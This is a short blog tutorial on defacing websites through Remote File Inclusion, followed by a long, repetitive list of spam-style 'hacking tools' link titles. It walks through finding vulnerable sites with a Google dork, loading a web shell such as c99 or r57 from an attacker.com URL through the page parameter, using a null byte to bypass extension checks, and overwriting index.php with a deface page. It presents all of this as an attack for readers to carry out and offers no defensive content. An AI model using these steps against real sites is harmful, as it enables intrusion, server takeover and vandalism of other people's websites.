2024. január 26., péntek

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

Remote File Inclusion (RFI) is a technique that allows the attacker to upload a malicious code or file on a website or server. The vulnerability exploits the different sort of validation checks in a website and can lead to code execution on server or code execution on the website. This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of the tutorial, I suppose you will know what it is all about and may be able to deploy an attack.
RFI is a common vulnerability. All the website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and play almost anything with the server. Why it put a red alert to the websites, just because of that you only need to have your common sense and basic knowledge of PHP to execute malicious code. BASH might come handy as most of the servers today are hosted on Linux.

SO, HOW TO HACK A WEBSITE OR SERVER WITH RFI?

First of all, we need to find out an RFI vulnerable website. Let's see how we can find one.
As we know finding a vulnerability is the first step to hack a website or server. So, let's get started and simply go to Google and search for the following query.
inurl: "index.php?page=home"
At the place of home, you can also try some other pages like products, gallery and etc.
If you already a know RFI vulnerable website, then you don't need to find it through Google.
Once we have found it, let's move on to the next step. Let's see we have a following RFI vulnerable website.
http://target.com/index.php?page=home
As you can see, this website pulls documents stored in text format from the server and renders them as web pages. Now we can use PHP include function to pull them out. Let's see how it works.
http://target.com/index.php?page=http://attacker.com/maliciousScript.txt
I have included my malicious code txt URL at the place of home. You can use any shell for malicious scripts like c99, r57 or any other.
Now, if it's a really vulnerable website, then there would be 3 things that can happen.
  1. You might have noticed that the URL consisted of "page=home" had no extension, but I have included an extension in my URL, hence the site may give an error like 'failure to include maliciousScript.txt', this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
  2. In case, it automatically appends something in the lines of .php then we have to use a null byte '' in order to avoid error.
  3. Successful execution.
As we get the successful execution of the code, we're good to go with the shell. Now we'll browse the shell for index.php. And will replace the file with our deface page.
Related links
  1. World No 1 Hacker Software
  2. Hacking Tools Download
  3. Easy Hack Tools
  4. Pentest Tools Bluekeep
  5. Hacking Tools Download
  6. New Hack Tools
  7. Hack Tools For Ubuntu
  8. Hacking Tools For Windows 7
  9. Hacker
  10. Usb Pentest Tools
  11. Hack Tools Github
  12. Hacker Tool Kit
  13. Hack Tools For Games
  14. Black Hat Hacker Tools
  15. Pentest Tools List
  16. Pentest Tools For Windows
  17. Hacking Tools Name
  18. Black Hat Hacker Tools
  19. Pentest Tools For Android
  20. Pentest Tools Framework
  21. Top Pentest Tools
  22. Hacking Tools For Kali Linux
  23. Pentest Tools Find Subdomains
  24. Kik Hack Tools
  25. Pentest Tools For Windows
  26. Pentest Tools Url Fuzzer
  27. Install Pentest Tools Ubuntu
  28. Hack Tools For Games
  29. Termux Hacking Tools 2019
  30. Hacking Tools Mac
  31. Nsa Hack Tools
  32. World No 1 Hacker Software
  33. Hack Tools For Windows
  34. Hacking Tools For Windows 7
  35. Pentest Tools Subdomain
  36. Hack And Tools
  37. Pentest Tools Bluekeep
  38. Pentest Tools Tcp Port Scanner
  39. Hacker Tools List
  40. Hacking Tools Windows 10
  41. Pentest Tools Kali Linux
  42. Hacking Tools 2019
  43. World No 1 Hacker Software
  44. How To Make Hacking Tools
  45. Hacker
  46. Hacking Apps
  47. How To Make Hacking Tools
  48. Best Hacking Tools 2020
  49. Bluetooth Hacking Tools Kali
  50. Hacker Tool Kit
  51. Best Hacking Tools 2019
  52. Hacker Tools List
  53. Hacking Tools For Pc
  54. Hacker Tools Free Download
  55. What Are Hacking Tools
  56. Hacker
  57. Hack Website Online Tool
  58. Hack Tools Online
  59. Hacking Tools Windows
  60. Pentest Tools Port Scanner
  61. World No 1 Hacker Software
  62. Hack Tools Github
  63. Pentest Tools Alternative
  64. Pentest Tools Linux
  65. Tools Used For Hacking
  66. Kik Hack Tools
  67. Pentest Tools Linux
  68. Hack And Tools
  69. Hacker
  70. Hacking Tools For Windows Free Download
  71. Hack Tools For Mac
  72. Hack Tools Mac
  73. Hacking Tools For Mac
  74. What Are Hacking Tools
  75. Hack Rom Tools
  76. Pentest Tools List
  77. Hack Tool Apk
  78. Hack Tool Apk No Root
  79. Hacker Tools Hardware
  80. Hack Website Online Tool
  81. Hacker Techniques Tools And Incident Handling
  82. Hacker Tools List
  83. Pentest Automation Tools
  84. Hacking Tools Usb
  85. Hacking Apps
  86. Hack Tools Github
  87. Hacking Tools Kit
  88. Android Hack Tools Github
  89. Hacker Tools For Mac
  90. Hacker Tools Mac
  91. Hacker Tools Apk
  92. Hacker Security Tools
  93. Hack Tools For Windows
  94. Pentest Tools List
  95. Pentest Tools Alternative
  96. Easy Hack Tools
  97. Nsa Hack Tools
  98. Hack Tools For Ubuntu
  99. Hack Tools
  100. How To Install Pentest Tools In Ubuntu
  101. How To Hack
  102. Pentest Reporting Tools
  103. Hacker Hardware Tools
  104. Hacking Tools And Software

Nincsenek megjegyzések:

Megjegyzés küldése